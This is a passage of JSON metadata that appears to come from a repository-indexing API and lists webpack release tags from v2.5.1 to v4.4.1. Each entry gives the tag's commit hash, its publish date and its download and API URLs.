/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fweb